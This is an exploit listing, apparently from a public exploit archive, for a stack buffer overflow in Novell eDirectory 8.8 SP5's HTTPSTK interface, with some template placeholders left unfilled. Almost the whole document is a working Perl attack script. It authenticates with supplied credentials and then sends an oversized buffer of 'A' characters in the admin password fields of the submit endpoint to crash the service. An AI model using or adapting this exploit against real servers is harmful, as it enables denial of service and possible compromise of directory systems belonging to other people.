| # Exploit Title: Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability# Date: 2009-11-17
 # Author: karak0rsan
 # Software Link: [downoad link if available]
 # Version: Novell eDirectory 8.8 SP5 HTTPSTK
 # Tested on: [relevant os]
 # Code : [exploit code]
 #!usr\bin\perl# Novell eDirectory 8.8 SP5 HTTPSTK BoF Vuln - 0day
 # Vulnerability found in Hellcode Labs.
 # karak0rsan || murderkey
 # info[at]hellcode.net || www.hellcode.net
 use WWW::Mechanize;
 use LWP::Debug qw(+); use HTTP::Cookies;use HTTP::Request::Common;;
 $target=$ARGV[0]; if(!$ARGV[0]){
        print "Novell eDirectory 8.8 SP5 Exploit\n";        print "Hellcode Research || Hellcode.net\n";        print "Usage:perl $0 [target]\n"; exit();}
 print "Username:";
          $username = <STDIN>;          chomp($username);          print "Password:";          $password = <STDIN>;          chomp($password); $login_url = "$target/_LOGIN_SERVER_";
 $url = "$target/dhost/httpstk;submit"; $buffer = "\x41" x 476; my $mechanize = WWW::Mechanize->new(); $mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
 $mechanize->timeout($url_timeout);
 $res = $mechanize->request(HTTP::Request->new('GET', "$login_url")); $mechanize->submit_form(
                  form_name => "authenticator",                  fields    => {                     usr => $username,                     pwd => $password},                     button => 'Login'); $res2 = $mechanize->request(HTTP::Request->new('GET', "$url"));$res2 = $mechanize->request(POST "$url", [sadminpwd => $buffer, verifypwd => $buffer]);
 
 |